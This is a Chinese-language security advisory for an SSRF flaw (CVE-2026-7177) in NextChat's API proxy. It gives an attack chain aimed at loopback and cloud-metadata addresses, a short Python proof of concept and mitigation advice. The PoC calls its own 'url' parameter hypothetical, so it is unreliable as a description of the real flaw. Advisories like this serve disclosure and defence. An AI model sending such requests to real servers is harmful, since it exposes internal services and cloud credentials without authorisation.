CVE-2026-7177 ChatGPTNextWeb NextChat SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-7177

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ChatGPTNextWeb NextChat

漏洞概述

ChatGPTNextWeb NextChat 2.16.1及之前版本存在服务器端请求伪造（SSRF）漏洞。该漏洞源于`app/api/[provider]/[...path]/route.ts`文件中的`proxyHandler`函数存在逻辑缺陷。攻击者无需用户交互即可远程利用此漏洞，操纵服务器向内网或外部发起恶意请求，造成敏感信息泄露或进一步攻击。

技术细节

该漏洞的核心在于ChatGPTNextWeb NextChat的API代理实现机制中存在缺陷。位于`app/api/[provider]/[...path]/route.ts`的`proxyHandler`函数负责转发请求到上游AI服务提供商。由于该函数未能严格校验或过滤目标URL，攻击者可以构造恶意的HTTP请求，将原本应发往合法AI API的请求重定向到任意内部或外部地址（如内网IP地址或本地元数据服务）。由于CVSS向量显示无需认证（PR:N）且无需用户交互（UI:N），攻击者可以直接向受影响端点的API接口发送特制数据包。成功利用后，攻击者可以利用受害服务器的网络身份扫描内网端口、访问云元数据端点或对内网其他脆弱服务发起攻击，从而突破网络边界防御。

攻击链分析

STEP 1

1. 漏洞发现

攻击者识别出目标正在使用存在漏洞的ChatGPTNextWeb NextChat版本（<= 2.16.1）。

STEP 2

2. 构造恶意载荷

攻击者构造包含内网地址（如127.0.0.1或169.254.169.254）的HTTP请求，针对`/api/[provider]/[...path]`路由。

STEP 3

3. 发起SSRF攻击

攻击者向受害服务器发送恶意请求，`proxyHandler`函数无验证地将其转发至攻击者指定的内部地址。

STEP 4

4. 信息泄露与利用

受害服务器返回内部服务的响应（如环境变量、端口状态），攻击者利用这些信息进行进一步的内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual vulnerable host)
target_url = "http://localhost:3000/api/openai/v1/engines"

# Malicious internal address to scan (e.g., local DNS or admin panel)
# The application acts as a proxy, so we inject the target in the path or header
# depending on how the route.ts handles the [...path] parameter.
# Assuming the proxy forwards the request blindly.

# Example payload trying to access internal metadata or another internal port
internal_target = "http://127.0.0.1:8080/api/status"

# Constructing the malicious request
# Note: The actual exploitation depends on the exact implementation of proxyHandler.
# This is a conceptual PoC demonstrating the SSRF behavior.
headers = {
    "Content-Type": "application/json"
}

# In a real scenario, the payload might be passed in the query parameter or body
# that the proxyHandler uses to construct the upstream URL.
data = {
    "url": internal_target  # Hypothetical parameter controlling the destination
}

try:
    response = requests.post(target_url, json=data, headers=headers, timeout=5)
    if response.status_code == 200:
        print(f"[+] SSRF Successful! Response received:")
        print(response.text[:200])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

ChatGPTNextWeb NextChat <= 2.16.1

防御指南

临时缓解措施

如果无法立即升级，建议通过防火墙规则限制应用服务器的出站连接，仅允许访问必要的第三方API域名。同时，可在反向代理层（如Nginx）对传入`/api/`路径的请求参数进行清洗和拦截。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7177
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7177
3 Details https://www.cvedetails.com/cve/CVE-2026-7177/
4 VulDB https://vuldb.com/cve/CVE-2026-7177
5 Link https://gist.github.com/YLChen-007/da6b00024f5b7e1d4fa0658c19b77fbf
6 Link https://github.com/ChatGPTNextWeb/NextChat/
7 Link https://github.com/ChatGPTNextWeb/NextChat/issues/6742
8 Link https://vuldb.com/submit/797645
9 Link https://vuldb.com/vuln/359779
10 Link https://vuldb.com/vuln/359779/cti